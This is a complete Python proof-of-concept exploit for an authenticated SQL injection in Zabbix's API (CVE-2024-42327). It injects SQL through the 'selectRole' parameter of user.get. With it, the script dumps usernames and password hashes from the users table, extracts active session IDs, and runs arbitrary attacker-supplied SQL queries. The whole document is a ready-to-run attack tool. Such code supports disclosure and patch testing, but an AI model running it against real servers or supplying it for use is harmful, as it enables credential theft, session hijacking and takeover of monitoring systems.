# POC by x.com/w4tchdog2000 / github.com/watchdog1337
# Authenticated SQL Injection against Zabbix (CVE-2024-42327)

import argparse
import requests


ZABBIX_API_JSON_ENDPOINT = 'api_jsonrpc.php'
ZABBIX_API_BASE_JSON = {
    "jsonrpc":"2.0",
    "id":1, 
    "method": "METHOD",
    "params":{}
}

ZABBIX_API_AUTHENTICATE_METHOD = 'user.login'
ZABBIX_API_GET_USERS = 'user.get'

BASE_SQLI_PAYLOAD = "name, (SQL_STATEMENT_HERE)"


def zabbix_api_request(api_url, method, params):
    request_json = ZABBIX_API_BASE_JSON
    request_json['method'] = method
    request_json['params'] = params

    resp = requests.get(api_url, json=request_json, verify=False)
    if not resp.json():
        print(f'[-] - Something went wrong in API request for method: {ZABBIX_API_AUTHENTICATE_METHOD}')
        print(resp.status_code)
        print(resp.content)
        return None
        
    return resp.json()


def zabbix_api_authenticate(api_url, username, password):
    method = ZABBIX_API_AUTHENTICATE_METHOD
    params = {
        "username": username,
        "password": password
    }

    resp = zabbix_api_request(api_url, method, params)
    if not resp:
        return None

    auth_token = resp.get('result', None)

    return auth_token


def zabbix_api_get_users(api_url):
    method = ZABBIX_API_GET_USERS
    params = {
        "output": ["userid", "username"], 
        "selectRole": ["type", "roleid", "name","readonly"]
    }
    resp = zabbix_api_request(api_url, method, params)
    user_details = resp.get('result', [])
    for u in user_details:
        print(u)


def sqli_leak_credentials(api_url):
    this_sql = "SELECT GROUP_CONCAT(userid, ', ', username, ', ', passwd, ', ', roleid, ' || ') FROM users"

    method = ZABBIX_API_GET_USERS
    params = {
        "output":["userid", "username"],
        "selectRole": [BASE_SQLI_PAYLOAD.replace('SQL_STATEMENT_HERE', this_sql)],
        "userids": 1
    }
    resp = zabbix_api_request(api_url, method, params)
    user_details = resp.get('result', [])
    if not user_details:
        return None

    user_details = user_details[0].get('role', {}).get(f'({this_sql})').split(' || ')
    for u in user_details:
        if u:
            userid, username, passwd, roleid = u.split(', ')
            print(f'userid: {userid.replace(",", "")}, username: {username}, password: {passwd}, roleid: {roleid}')


def sqli_leak_session_tokens(api_url):
    this_sql = "SELECT GROUP_CONCAT(userid, ', ', sessionid, ' || ') FROM sessions"

    method = ZABBIX_API_GET_USERS
    params = {
        "output":["userid", "username"],
        "selectRole": [BASE_SQLI_PAYLOAD.replace('SQL_STATEMENT_HERE', this_sql)],
        "userids": 1
    }
    resp = zabbix_api_request(api_url, method, params)
    user_details = resp.get('result', [])
    if not user_details:
        return None

    user_details = user_details[0].get('role', {}).get(f'({this_sql})').split(' || ')
    for u in user_details:
        if u:
            userid, sessionid = u.split(', ')
            print(f'userid: {userid.replace(",", "")}, sessionid: {sessionid}')


def sqli_custom(api_url, query):
    this_sql = query

    method = ZABBIX_API_GET_USERS
    params = {
        "output":["userid", "username"],
        "selectRole": [BASE_SQLI_PAYLOAD.replace('SQL_STATEMENT_HERE', this_sql)],
        "userids": 1
    }
    resp = zabbix_api_request(api_url, method, params)
    user_details = resp.get('result', [])
    if not user_details:
        return None

    user_details = user_details[0].get('role', {}).get(f'({this_sql})')
    print(user_details)


def main():
    # Set up the argument parser
    parser = argparse.ArgumentParser(description="Accept a URL, USERNAME, PASSWORD, and an optional custom SQL query.")

    # Required arguments
    parser.add_argument('-u', '--url', type=str, help="The URL to Zabbix (please include the path -  http://example.com/zabbix/)", required=True)
    parser.add_argument('-U', '--username', type=str, help="The username to authenticate with", required=True)
    parser.add_argument('-P', '--password', type=str, help="The password to authenticate with", required=True)

    # Optional argument for SQL query
    parser.add_argument('--query', type=str, help="An optional custom SQL query to run through the SQL Injection")

    # Parse arguments
    args = parser.parse_args()

    # ensure zabbix url has protocol (assume https if nothing provided)
    zabbix_base_url = args.url
    if not zabbix_base_url.startswith('http'):
        zabbix_base_url = f'https://{zabbix_base_url}'

    # ensure url ends with /
    if not zabbix_base_url.endswith('/'):
        zabbix_base_url += '/'

    API_URL = zabbix_base_url + ZABBIX_API_JSON_ENDPOINT
    print(f'[*] - Using {API_URL} for API.')

    # Authenticate to gain session token
    print(f'\n[*] - Authenticating with username: "{args.username}" and password "{args.password}"')
    auth_token = zabbix_api_authenticate(API_URL, args.username, args.password)
    if not auth_token:
        print(f'[-] - Authentication Failed')
        return

    print('[+] - Authentication Success!')
    ZABBIX_API_BASE_JSON['auth'] = auth_token

    # custom query has been defined
    if args.query:
        print(f'\nAttempting custom SQL Query: {args.query}')
        sqli_custom(API_URL, args.query)
        return

    print('\n[*] - Getting user details')
    zabbix_api_get_users(API_URL)

    print('\n[*] - Using SQL Injection to leak user credentials')
    sqli_leak_credentials(API_URL)

    print('\n[*] - Leaking Session Tokens for API use')
    sqli_leak_session_tokens(API_URL)


if __name__ == "__main__":
    main()
